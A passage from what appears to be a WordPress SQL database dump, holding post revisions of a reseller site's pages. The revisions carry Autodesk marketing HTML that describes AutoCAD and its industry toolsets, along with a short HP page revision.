src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-architecture-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" />\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds features for architectural drawing, documentation, and schedules, and for automating drafting tasks.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create floor plans, sections, elevations, and other building design drawings using specialized tools.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Additional features include walls, door, and windows.</li>\r\n 	<li class=\"wd-font-16\">Use 8,000+ intelligent architectural objects and styles to support AIA 2nd edition, BS1192 DIN 276, ISYBAU Long Format, ISYBAU Short Format, and STLB layer standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n\r\n&nbsp;\r\n\r\n<img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-electrical-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" />\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds electrical design features to help you create, modify, and document electrical controls systems.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create panel layouts, schematic diagrams, and other electrical drawings using specialized tools.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use consistent project standards with drawings organized in a project-based structure.</li>\r\n 	<li class=\"wd-font-16\">Includes a library of 65,000+ intelligent electrical symbols to support AS, GB, IEC, IEC-60617, JIC, JIS, NFPA, and IEEE standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-map-3d-2019-lockup-460x47.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Incorporate GIS topology with AutoCAD so you can use and maintain CAD and GIS data for planning, design, and data management.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create, maintain, and communicate mapping and GIS information within the AutoCAD drawing environment.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use task-based tools to manage GIS data and aggregate it with design data.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Access spatial data stored in files, databases, and web services.</li>\r\n 	<li class=\"wd-font-16\">Use standard data schema, automated business workflows, and report templates for Electric North America, Electric Europe, Water, Wastewater, and Gas industries.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-mechanical-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds a library of standards-based parts and tools to help you create, modify, and document mechanical designs for manufacturing.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Automate mechanical engineering tasks, such as generating machine components, dimensioning, and creating bills of material.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create parts, assemblies, and other drawings for product design using specialized tools.</li>\r\n 	<li class=\"wd-font-16\">Use 700,000+ intelligent manufacturing parts, features, and symbols to support ISO, ANSI, DIN, JIS, BSI, CSN, and GB standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-mep-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds features to help you draft, design, and document MEP building systems in an AutoCAD environment.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create accurate construction documentation of MEP systems design.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use task-based tools to create MEP drawings for building systems.</li>\r\n 	<li class=\"wd-font-16\">Use 10,500+ intelligent MEP objects to support AIA 2nd edition, BS1192 Descriptive, and BS1192 â€“ AUG Version 2 standards, and DIN 276, ISYBAU Long Format, ISYBAU Short Format, and STLB layer standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-plant-3d-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds features to help you produce P&amp;IDs, and then integrate them into a 3D plant design model.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Generate and share isometrics, orthographics, and materials reports.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create schematic diagrams, plant layouts, and other drawings for plant design using specialized tools.</li>\r\n 	<li class=\"wd-font-16\">Includes a library of 400+ intelligent plant objects such as equipment templates, support templates, and structural members to support 40 standards, including ANSI and DIN.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-raster-design-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds raster-to-vector tools to help you convert raster images into DWGâ„¢ objects. Edit scanned drawings in a familiar AutoCAD environment.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Despeckle, bias, mirror, and touch up your images.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use standard AutoCAD commands on raster regions and primitives. Easily erase raster images, lines, arcs, and circles.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create lines and polylines from raster images, and convert raster files into vector drawings.</li>\r\n 	<li class=\"wd-font-16\">Show and analyze geo images in Civil 3D civil engineering software and the AutoCAD Map 3D toolset.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-lockups-banners/2019/autocad-web-app-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Access AutoCAD from any computer.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">View, create, and edit AutoCAD drawings.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Work on the latest drawings from anywhere.</li>\r\n 	<li class=\"wd-font-16\">Access updates in real time.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Autodesk','','inherit','closed','closed','','1444-revision-v1','','','2018-12-12 09:54:14','2018-12-12 01:54:14','',1444,'https://bintara.com.my/blog/2018/12/12/1444-revision-v1/',0,'revision','',0),(1749,1,'2019-01-08 11:24:32','2019-01-08 03:24:32','<a href=\"https://bintara.com.my/designjet-large-format-office-printers/\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1681\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-Logo-V2.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','HP','','inherit','closed','closed','','1385-autosave-v1','','','2019-01-08 11:24:32','2019-01-08 03:24:32','',1385,'https://bintara.com.my/blog/2018/12/12/1385-autosave-v1/',0,'revision','',0),(1750,1,'2018-12-12 09:59:06','2018-12-12 01:59:06','<div class=\"grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-mr-16 wd-pb-20 wd-bbw-1 wd-bc-smoke\">\r\n<div class=\"column-content parsys\">\r\n<div>\r\n<div class=\"heading section\">\r\n<h1 class=\"wd-font-40 wd-bold wd-color-white wd-uppercase\">Autodesk</h1>\r\n</div>\r\n<div class=\"text section\">\r\n<p class=\"wd-color-white wd-light wd-font-16 wd-mt-6\"><strong>Autodesk</strong> makes software for people who make things. If youâ€™ve ever driven a high-performance car, admired a towering skyscraper, used a smartphone, or watched a great film, chances are youâ€™ve experienced what millions of Autodesk customers are doing with our software.</p>\r\n\r\n<h2></h2>\r\n</div>\r\n</div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"heading section\">\r\n<h1 class=\"wd-normal wd-uppercase wd-color-gray-25 wd-font-34 wd-mt-16 wd-mb-0\">ONLY ONE. AUTOCAD.</h1>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-mr-16 wd-pt-20\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<p class=\"wd-mt-0 wd-mb-12 wd-font-19 wd-color-gray-40\">From mechanical design aids to architecture tools to model-based GIS and mapping features, subscribe to AutoCAD software and access industry-specific toolsets, plus web and mobile apps.</p>\r\n\r\n<div class=\"heading section\">\r\n<h2></h2>\r\n<h2 class=\"pc-brand wd-light wd-font-30\">Work faster with specialized toolsets</h2>\r\n</div>\r\n<div class=\"text section\">\r\n<p class=\"wd-light wd-mv-16 wd-font-19\">AutoCAD now includes industry-specific features and libraries for architecture, mechanical design, electrical design, and more.</p>\r\n\r\n<ul class=\"wd-pl-20 wd-mv-0\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Automate floor plans, sections, elevations, and other drawings.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Draw piping, plumbing, and ducting for faster design with mechanical tools.</li>\r\n 	<li class=\"wd-font-16\">Design ductwork, electrical conduit, and circuiting for HVAC, plumbing, and electrical with MEP (mechanical, electrical, and plumbing).</li>\r\n</ul>\r\n&nbsp;\r\n<div class=\"heading section\">\r\n<h2 class=\"pc-brand wd-light wd-font-30\">Take your work with you with AutoCAD web and mobile apps</h2>\r\n</div>\r\n<div class=\"text section\">\r\n<p class=\"wd-light wd-mv-16 wd-font-19\">With a single AutoCAD subscription, work anywhere and stay connected to your DWGâ„¢ files on any platformâ€”desktop, web, or mobile. Easily move data and drawings between your desktop, web browser, and phone.</p>\r\n\r\n</div>\r\n</div>\r\n<div class=\"wd-mb-16 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"heading section\">\r\n<h2></h2>\r\n<h2 class=\"pc-brand wd-light wd-font-30\">What\'s included</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"large-7 grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-bbw-1-sm wd-bc-smoke wd-pb-24-sm\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<p class=\"wd-light wd-mt-0 wd-mb-16 wd-font-19\">Specialized toolsets offer industry-specific features to help you design more quickly and easily:</p>\r\n\r\n<ul class=\"wd-pl-20 wd-mv-0\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create details, views, and more.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Automate tasks and annotations.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use a rules-driven workflow to enforce industry standards and generate schedules, lists, and tables.</li>\r\n 	<li class=\"wd-font-16\">Access libraries of symbols, parts, and detail components.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"text section\">\r\n<div class=\"text section\">\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<h2></h2>\r\n<h4><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></h4>\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">The original AutoCAD 2D and 3D CAD software provides innovative tools for design and documentation.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create and edit 2D geometry and 3D models with solids, surfaces, and mesh objects.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Annotate drawings with text, dimensions, leaders, and tables.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Customize the ribbon and tool palettes.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Customize with add-on apps and APIs.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Extract object data to tables.</li>\r\n 	<li class=\"wd-font-16\">Attach and import data from PDF files.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n\r\n&nbsp;\r\n\r\n<img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-architecture-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" />\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds features for architectural drawing, documentation, and schedules, and for automating drafting tasks.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create floor plans, sections, elevations, and other building design drawings using specialized tools.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Additional features include walls, door, and windows.</li>\r\n 	<li class=\"wd-font-16\">Use 8,000+ intelligent architectural objects and styles to support AIA 2nd edition, BS1192 DIN 276, ISYBAU Long Format, ISYBAU Short Format, and STLB layer standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n\r\n&nbsp;\r\n\r\n<img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-electrical-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" />\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds electrical design features to help you create, modify, and document electrical controls systems.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create panel layouts, schematic diagrams, and other electrical drawings using specialized tools.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use consistent project standards with drawings organized in a project-based structure.</li>\r\n 	<li class=\"wd-font-16\">Includes a library of 65,000+ intelligent electrical symbols to support AS, GB, IEC, IEC-60617, JIC, JIS, NFPA, and IEEE standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-map-3d-2019-lockup-460x47.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Incorporate GIS topology with AutoCAD so you can use and maintain CAD and GIS data for planning, design, and data management.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create, maintain, and communicate mapping and GIS information within the AutoCAD drawing environment.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use task-based tools to manage GIS data and aggregate it with design data.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Access spatial data stored in files, databases, and web services.</li>\r\n 	<li class=\"wd-font-16\">Use standard data schema, automated business workflows, and report templates for Electric North America, Electric Europe, Water, Wastewater, and Gas industries.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-mechanical-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds a library of standards-based parts and tools to help you create, modify, and document mechanical designs for manufacturing.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Automate mechanical engineering tasks, such as generating machine components, dimensioning, and creating bills of material.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create parts, assemblies, and other drawings for product design using specialized tools.</li>\r\n 	<li class=\"wd-font-16\">Use 700,000+ intelligent manufacturing parts, features, and symbols to support ISO, ANSI, DIN, JIS, BSI, CSN, and GB standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-mep-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds features to help you draft, design, and document MEP building systems in an AutoCAD environment.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create accurate construction documentation of MEP systems design.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use task-based tools to create MEP drawings for building systems.</li>\r\n 	<li class=\"wd-font-16\">Use 10,500+ intelligent MEP objects to support AIA 2nd edition, BS1192 Descriptive, and BS1192 â€“ AUG Version 2 standards, and DIN 276, ISYBAU Long Format, ISYBAU Short Format, and STLB layer standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-plant-3d-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds features to help you produce P&amp;IDs, and then integrate them into a 3D plant design model.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Generate and share isometrics, orthographics, and materials reports.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create schematic diagrams, plant layouts, and other drawings for plant design using specialized tools.</li>\r\n 	<li class=\"wd-font-16\">Includes a library of 400+ intelligent plant objects such as equipment templates, support templates, and structural members to support 40 standards, including ANSI and DIN.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-raster-design-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds raster-to-vector tools to help you convert raster images into DWGâ„¢ objects. Edit scanned drawings in a familiar AutoCAD environment.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Despeckle, bias, mirror, and touch up your images.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use standard AutoCAD commands on raster regions and primitives. Easily erase raster images, lines, arcs, and circles.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create lines and polylines from raster images, and convert raster files into vector drawings.</li>\r\n 	<li class=\"wd-font-16\">Show and analyze geo images in Civil 3D civil engineering software and the AutoCAD Map 3D toolset.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-lockups-banners/2019/autocad-web-app-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Access AutoCAD from any computer.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">View, create, and edit AutoCAD drawings.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Work on the latest drawings from anywhere.</li>\r\n 	<li class=\"wd-font-16\">Access updates in real 